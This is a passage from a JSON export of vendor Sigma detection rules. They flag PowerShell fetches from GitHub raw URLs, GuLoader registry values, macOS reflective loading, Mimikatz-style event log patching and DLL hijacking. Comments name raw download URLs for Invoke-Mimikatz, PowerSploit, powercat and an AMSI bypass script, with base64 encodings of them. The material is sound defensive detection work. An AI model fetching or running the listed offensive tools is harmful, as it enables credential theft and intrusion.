"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://cyble.com/blog/winrar-flaw-exposes-users-to-apanyan-asyncrat-murk/",
"https://attack.mitre.org/techniques/T1102/003/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_suspicious_urls_cmd.yml",
"content": "title: URLs of Suspicious Code Repository in PowerShell Command-line\nid: fe179170-1bf7-4cc0-815e-3a0021d10561\ndescription: |\n Detects URLs to suspicious code repositories in PowerShell command-lines.\n These are usually existing, legitimate external Web services like Github that allow users to host content.\n Popular websites and social media may give cover to adversaries, due to hosts communicating to these domains before being compromised.\n Adversaries can use these domains to send commands or upload payloads to a compromised system.\n It is recommended to investigate the URL contained in the PowerShell command-line to look whether it is pointing to a legitimate code repositories.\nreferences:\n - https://cyble.com/blog/winrar-flaw-exposes-users-to-apanyan-asyncrat-murk/\n - https://attack.mitre.org/techniques/T1102/003/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/08/18\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.003\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_suspicious_args:\n CommandLine|contains:\n # generic raw githubusercontent , this is oftently malicious stuff\n - '/raw.githubusercontent.com/'\n # /raw.githubusercontent.com/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - '8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n - 'vAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - 
'/gist.githubusercontent.com/'\n - 'LwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '8AZwBpAHMAdAAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - 'vAGcAaQBzAHQALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n\n # There is another rule for that\n exclusion_malicious:\n CommandLine|contains:\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Find-Fruit.ps1\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\n - '/S3cur3Th1sSh1t/'\n # /S3cur3Th1sSh1t/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwBTADMAYwB1AHIAMwBUAGgAMQBzAFMAaAAxAHQALw'\n - '8AUwAzAGMAdQByADMAVABoADEAcwBTAGgAMQB0AC8A'\n - 'vAFMAMwBjAHUAcgAzAFQAaAAxAHMAUwBoADEAdAAvA'\n # 'https://raw.githubusercontent.com/pwnieexpress/Metasploit-framework/master/exploits/powershell/powerdump.ps1\n - '/pwnieexpress/'\n - 'LwBwAHcAbgBpAGUAZQB4AHAAcgBlAHMAcwAvA'\n - '8AcAB3AG4AaQBlAGUAeABwAHIAZQBzAHMALw'\n - 'vAHAAdwBuAGkAZQBlAHgAcAByAGUAcwBzAC8A'\n # https://raw.githubusercontent.com/EmpireProject/Empire/master/module_source/credentials/Invoke-Mimikatz.ps1\n - '/EmpireProject/'\n - 'LwBFAG0AcABpAHIAZQBQAHIAbwBqAGUAYwB0AC8A'\n - '8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvA'\n - 'vAEUAbQBwAGkAcgBlAFAAcgBvAGoAZQBjAHQALw'\n # https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1\n - '/PowerSploit/'\n - 'LwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALw'\n - '8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8A'\n - 'vAFAAbwB3AGUAcgBTAHAAbABvAGkAdAAvA'\n # https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1\n - '/clymb3r/'\n - 'LwBjAGwAeQBtAGIAMwByAC8A'\n - '8AYwBsAHkAbQBiADMAcgAvA'\n - 'vAGMAbAB5AG0AYgAzAHIALw'\n - '/Invoke-Mimikatz/'\n - 'LwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAvA'\n - '8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALw'\n - 'vAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC8A'\n # 
https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1\n - '/BloodHoundAD/'\n - 'LwBCAGwAbwBvAGQASABvAHUAbgBkAEEARAAvA'\n - '8AQgBsAG8AbwBkAEgAbwB1AG4AZABBAEQALw'\n - 'vAEIAbABvAG8AZABIAG8AdQBuAGQAQQBEAC8A'\n # https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1\n - '/Kevin-Robertson/'\n - 'LwBLAGUAdgBpAG4ALQBSAG8AYgBlAHIAdABzAG8AbgAvA'\n - '8ASwBlAHYAaQBuAC0AUgBvAGIAZQByAHQAcwBvAG4ALw'\n - 'vAEsAZQB2AGkAbgAtAFIAbwBiAGUAcgB0AHMAbwBuAC8A'\n # https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/PowerSploit/Invoke-Mimikatz.ps1\n - '/Veil-Framework/'\n - 'LwBWAGUAaQBsAC0ARgByAGEAbQBlAHcAbwByAGsALw'\n - '8AVgBlAGkAbAAtAEYAcgBhAG0AZQB3AG8AcgBrAC8A'\n - 'vAFYAZQBpAGwALQBGAHIAYQBtAGUAdwBvAHIAawAvA'\n # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/Get-SPN/Get-SPN.psm1\n - '/nullbind/Powershellery/'\n - 'LwBuAHUAbABsAGIAaQBuAGQALwBQAG8AdwBlAHIAcwBoAGUAbABsAGUAcgB5AC8A'\n - '8AbgB1AGwAbABiAGkAbgBkAC8AUABvAHcAZQByAHMAaABlAGwAbABlAHIAeQAvA'\n - 'vAG4AdQBsAGwAYgBpAG4AZAAvAFAAbwB3AGUAcgBzAGgAZQBsAGwAZQByAHkALw'\n # https://gist.githubusercontent.com/shantanu561993/6483e524dc225a188de04465c8512909/raw/db219421ea911b820e9a484754f03a26fbfb9c27/AMSI_bypass_Reflection.ps1\n - '/shantanu561993/'\n - 'LwBzAGgAYQBuAHQAYQBuAHUANQA2ADEAOQA5ADMALw'\n - '8AcwBoAGEAbgB0AGEAbgB1ADUANgAxADkAOQAzAC8A'\n - 'vAHMAaABhAG4AdABhAG4AdQA1ADYAMQA5ADkAMwAvA'\n # https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\n - '/powercat/'\n - 'LwBwAG8AdwBlAHIAYwBhAHQALw'\n - '8AcABvAHcAZQByAGMAYQB0AC8A'\n - 'vAHAAbwB3AGUAcgBjAGEAdAAvA'\n # https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - '/FuzzySecurity/PowerShell-Suite/'\n - 'LwBGAHUAegB6AHkAUwBlAGMAdQByAGkAdAB5AC8AUABvAHcAZQByAFMAaABlAGwAbAAtAFMAdQBpAHQAZQAvA'\n - '8ARgB1AHoAegB5AFMAZQBjAHUAcgBpAHQAeQAvAFAAbwB3AGUAcgBTAGgAZQBsAGwALQBTAHUAaQB0AGUALw'\n 
- 'vAEYAdQB6AHoAeQBTAGUAYwB1AHIAaQB0AHkALwBQAG8AdwBlAHIAUwBoAGUAbABsAC0AUwB1AGkAdABlAC8A'\n # https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1\n - '/The-Viper-One/'\n - 'LwBUAGgAZQAtAFYAaQBwAGUAcgAtAE8AbgBlAC8A'\n - '8AVABoAGUALQBWAGkAcABlAHIALQBPAG4AZQAvA'\n - 'vAFQAaABlAC0AVgBpAHAAZQByAC0ATwBuAGUALw'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe179170-1bf7-4cc0-815e-3a0021d10561",
"rule_name": "URLs of Suspicious Code Repository in PowerShell Command-line",
"rule_description": "Detects URLs to suspicious code repositories in PowerShell command-lines.\nThese are usually existing, legitimate external Web services like GitHub that allow users to host content.\nPopular websites and social media may give cover to adversaries, because hosts typically communicate with these domains before being compromised.\nAdversaries can use these domains to send commands or upload payloads to a compromised system.\nIt is recommended to investigate the URL contained in the PowerShell command-line to check whether it points to a legitimate code repository.\n",
"rule_creation_date": "2022-08-18",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1102.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe310d5f-8420-465b-a622-8a6959b418ac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607322Z",
"creation_date": "2026-03-23T11:45:34.607326Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607333Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/software/S0561/"
],
"name": "t1055_guloader_registry_activity.yml",
"content": "title: Possible GuLoader Registry Activity\nid: fe310d5f-8420-465b-a622-8a6959b418ac\ndescription: |\n Detects suspicious registry values set by a NSIS GuLoader Installer.\n GuLoader is a small NSIS installer downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive.\n It is recommended to analyze the binary making the process access to look for malicious contents.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/software/S0561/\ndate: 2024/05/07\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1566.002\n - attack.execution\n - attack.t1106\n - attack.t1204.001\n - attack.t1204.002\n - attack.s0561\n - classification.Windows.Source.Registry\n - classification.Windows.Malware.GuLoader\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n Details:\n - 'kernel32::CreateFileA(m r? , i 0x*, i 0, p 0, i 4, i 0x*, i 0)*'\n - 'kernel32::SetFilePointer(i r?, i *, i 0,i 0)'\n - 'kernel32::VirtualAlloc(i 0,i *, i *, i 0x*)*'\n - 'kernel32::ReadFile(i r?, i r?, i *,*i 0, i 0)'\n - 'user32::EnumWindows(i r? ,i 0)'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe310d5f-8420-465b-a622-8a6959b418ac",
"rule_name": "Possible GuLoader Registry Activity",
"rule_description": "Detects suspicious registry values set by an NSIS GuLoader installer.\nGuLoader is a small NSIS installer downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive.\nIt is recommended to analyze the binary that set these registry values to look for malicious content.\n",
"rule_creation_date": "2024-05-07",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1071.001",
"attack.t1106",
"attack.t1204.001",
"attack.t1204.002",
"attack.t1566.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe3727cd-5557-4a6a-af9f-914026f32dc0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617188Z",
"creation_date": "2026-03-23T11:45:34.617191Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617198Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f",
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1620_reflective_loading_library.yml",
"content": "title: Suspicious Executable Reflective Loading File Loaded\nid: fe3727cd-5557-4a6a-af9f-914026f32dc0\ndescription: |\n Detects the loading of a specific file related to reflective binary execution on macOS.\n Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.\n It is recommended to check for malicious activities by the process loading the file.\nreferences:\n - https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f\n - https://attack.mitre.org/techniques/T1620/\ndate: 2024/06/18\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.macOS.Source.LibraryLoaded\n - classification.macOS.Behavior.DLLHijacking\nlogsource:\n category: library_event\n product: macos\ndetection:\n selection:\n ImageLoaded|contains: '/NSCreateObjectFileImageFromMemory-'\n\n exclusion_common_folders:\n Image|startswith:\n - '/System/Library/'\n - '/Library/Application Support/'\n - '/Applications/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n exclusion_steam:\n Image|startswith: '/Users/*/Library/Application Support/Steam/steamapps/common/'\n\n exclusion_video:\n Image: '/Volumes/RX 10 Audio Editor/Install RX 10 Audio Editor.app/Contents/MacOS/osx-x86_64'\n\n exclusion_audiolens:\n Image: '/Volumes/Audiolens/Install Audiolens.app/Contents/MacOS/osx-x86_64'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe3727cd-5557-4a6a-af9f-914026f32dc0",
"rule_name": "Suspicious Executable Reflective Loading File Loaded",
"rule_description": "Detects the loading of a specific file related to reflective binary execution on macOS.\nAdversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.\nIt is recommended to check the process loading the file for malicious activity.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe4a638f-f575-4374-8e3b-797ceb68ee70",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072246Z",
"creation_date": "2026-03-23T11:45:34.072248Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072253Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c",
"https://github.com/gentilkiwi/mimikatz/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_eventlog_patching.yml",
"content": "title: Windows Event Log Patched\nid: fe4a638f-f575-4374-8e3b-797ceb68ee70\ndescription: |\n Detects an attempt to open an svchost process with mimikatz-like permissions to patch the event log service.\n Mimikatz targets wevtsvc.dll (the Windows Event Service DLL) that is loaded in the svchost.exe responsible for the EventLog service.\n This is only an in-memory modification, once the service is restarted or computer is rebooted, the EventLog service will return to normal.\n Adversaries may disrupt Windows event logs to avoid possible detection of their malicious activities.\n It is recommended to analyze the context of this action, with the help of the process tree and to look for other malicious actions on the host.\nreferences:\n - https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c\n - https://github.com/gentilkiwi/mimikatz/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/06/21\nmodified: 2025/05/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.s0002\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\svchost.exe'\n TargetProcessUser: 'NT AUTHORITY\\LOCAL SERVICE'\n TargetProcessCommandLine|contains: 'svchost.exe -k LocalServiceNetworkRestricted'\n GrantedAccess: '0x1438'\n\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfetp.exe'\n - 'mfehcs.exe'\n - 'FireSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'Musarubra US LLC'\n\n exclusion_kaspersky:\n ProcessProcessName:\n - 'soyuz.exe' # C:\\Program Files (x86)\\Kaspersky Lab\\Endpoint Agent\\soyuz.exe\n - 'avp.exe' # C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security 10 for Windows SP1\\avp.exe / 
C:\\Program Files (x86)\\Kaspersky Lab\\KES.11.10.0\\avp.exe\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Kaspersky Lab JSC'\n - 'AO Kaspersky Lab'\n - 'Kaspersky Lab'\n - 'Kaspersky Labs GmbH'\n\n exclusion_checkpoint:\n ProcessImage: '?:\\Program Files (x86)\\CheckPoint\\Endpoint Security\\Anti-Malware\\epam_svc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Check Point Software Technologies Ltd.'\n\n exclusion_total_uninstall:\n ProcessImage: '?:\\Program Files\\Total Uninstall Essential\\Tu.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'MARTAU GAVRILA'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe4a638f-f575-4374-8e3b-797ceb68ee70",
"rule_name": "Windows Event Log Patched",
"rule_description": "Detects an attempt to open an svchost process with mimikatz-like permissions to patch the event log service.\nMimikatz targets wevtsvc.dll (the Windows Event Service DLL), which is loaded in the svchost.exe responsible for the EventLog service.\nThis is only an in-memory modification; once the service is restarted or the computer is rebooted, the EventLog service returns to normal.\nAdversaries may disrupt Windows event logs to avoid possible detection of their malicious activities.\nIt is recommended to analyze the context of this action with the help of the process tree, and to look for other malicious actions on the host.\n",
"rule_creation_date": "2021-06-21",
"rule_modified_date": "2025-05-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe514257-7cae-4868-8038-9d6629dfa431",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077944Z",
"creation_date": "2026-03-23T11:45:34.077947Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077951Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bytecodegenerator.yml",
"content": "title: DLL Hijacking via BytecodeGenerator.exe\nid: fe514257-7cae-4868-8038-9d6629dfa431\ndescription: |\n Detects potential Windows DLL Hijacking via BytecodeGenerator.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BytecodeGenerator.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\urlmon.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe514257-7cae-4868-8038-9d6629dfa431",
"rule_name": "DLL Hijacking via BytecodeGenerator.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BytecodeGenerator.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe6176aa-6160-4f56-a09c-fd15d655fb88",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078530Z",
"creation_date": "2026-03-23T11:45:34.078532Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078536Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/wastedlocker-technical-analysis/97944/",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mblctr.yml",
"content": "title: DLL Hijacking via MBLCTR.exe\nid: fe6176aa-6160-4f56-a09c-fd15d655fb88\ndescription: |\n Detects potential Windows DLL Hijacking via MBLCTR.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securelist.com/wastedlocker-technical-analysis/97944/\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MBLCTR.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\batmeter.dll'\n - '\\dwmapi.dll'\n - '\\mmdevapi.dll'\n - '\\uxtheme.dll'\n - '\\winmm.dll'\n - '\\wtsapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe6176aa-6160-4f56-a09c-fd15d655fb88",
"rule_name": "DLL Hijacking via MBLCTR.exe",
"rule_description": "Detects potential Windows DLL Hijacking via MBLCTR.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe94c773-1caa-44a0-876e-01e264b73dea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
